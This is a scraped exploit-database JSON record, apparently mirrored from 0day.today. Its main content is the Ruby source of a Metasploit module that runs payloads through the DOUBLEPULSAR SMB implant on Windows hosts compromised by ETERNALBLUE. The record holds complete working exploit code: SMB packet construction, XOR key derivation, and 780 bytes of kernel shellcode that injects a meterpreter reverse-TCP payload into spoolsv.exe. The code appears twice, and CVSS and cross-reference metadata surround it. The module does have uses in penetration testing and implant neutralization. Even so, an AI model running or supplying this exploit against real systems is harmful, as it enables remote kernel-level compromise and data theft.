ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack1('V')\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n print_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n print_warning(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n print_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n print_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable to 
proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload (x64)'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n 
simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n 
pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack('S<')\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" \\\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" \\\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" \\\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" \\\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" \\\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" \\\r\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" \\\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" \\\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" \\\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" \\\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" \\\r\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" \\\r\n 
\"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" \\\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" \\\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" \\\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" \\\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" \\\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" \\\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" \\\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" \\\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" \\\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" \\\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" \\\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" \\\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" \\\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" \\\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" \\\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" \\\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" \\\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" \\\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" \\\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" \\\r\n 
\"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" \\\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" \\\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" \\\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" \\\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" \\\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" \\\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" \\\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" \\\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" \\\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" \\\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" \\\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" \\\r\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" \\\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" \\\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" \\\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2021-10-26] #"}, "lastseen": "2021-10-26T08:20:15", "differentElements": ["sourceData"], "edition": 55}, {"bulletin": {"id": "1337DAY-ID-33895", "vendorId": null, "hash": "2d7dbe8a865bdaad8866e354e04f9617", "type": "zdt", "bulletinFamily": "exploit", "title": "SMB DOUBLEPULSAR Remote Code Execution Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as 
popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2020-02-04T00:00:00", "modified": "2020-02-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33895", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0143", "CVE-2017-0148", "CVE-2017-0144", "CVE-2017-0146", "CVE-2017-0147", "CVE-2017-0145"], "immutableFields": [], "lastseen": "2021-10-26T22:27:57", "history": [], "viewCount": 112, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "nessus", "idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL", "700059.PRM", "700099.PRM"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:43970", "EDB-ID:41987", "EDB-ID:47456"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-27802", 
"1337DAY-ID-33313", "1337DAY-ID-27752", "1337DAY-ID-27786", "1337DAY-ID-29702"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810698", "OPENVAS:1361412562310810676"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142548", "PACKETSTORM:146236", "PACKETSTORM:154690", "PACKETSTORM:156196", "PACKETSTORM:142181"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE"]}, {"type": "seebug", "idList": ["SSV:92964", "SSV:92952"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0143", "CVE-2017-0146", "CVE-2017-0147", "CVE-2017-0144", "CVE-2017-0145", "CVE-2017-0148"]}, {"type": "symantec", "idList": ["SMNTC-96704", "SMNTC-96709", "SMNTC-96706", "SMNTC-96707", "SMNTC-96703", "SMNTC-96705"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", 
"TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "threatpost", "idList": ["THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591"]}, {"type": "mmpc", "idList": ["MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:FECB9309EE6D84976C56C12C05F1CD02"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:FF56343C15BACA1C1CE83A105EFD7F77"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2", "QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0143", "MS:CVE-2017-0148", "MS:CVE-2017-0144", "MS:CVE-2017-0145"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2021-10-26T22:27:57", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-10-26T22:27:57", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33895", "sourceData": "##\r\n# This 
module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n include Msf::Module::Deprecated\r\n\r\n moved_from 'exploit/windows/smb/doublepulsar_rce'\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'SMB DOUBLEPULSAR Remote Code Execution',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14', # Shadow Brokers leak\r\n 'License' => 
MSF_LICENSE,\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X64,\r\n 'Privileged' => true,\r\n 'Payload' => {\r\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 'DisableNops' => true\r\n },\r\n 'Targets' => [\r\n ['Execute payload (x64)',\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n }\r\n ],\r\n ['Neutralize implant',\r\n 'DefaultOptions' => {\r\n 'PAYLOAD' => nil # XXX: \"Unset\" generic payload\r\n }\r\n ]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_OS_DOWN],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }.freeze\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }.freeze\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? 
ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack1('V')\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n print_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n print_warning(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n print_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n print_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable to 
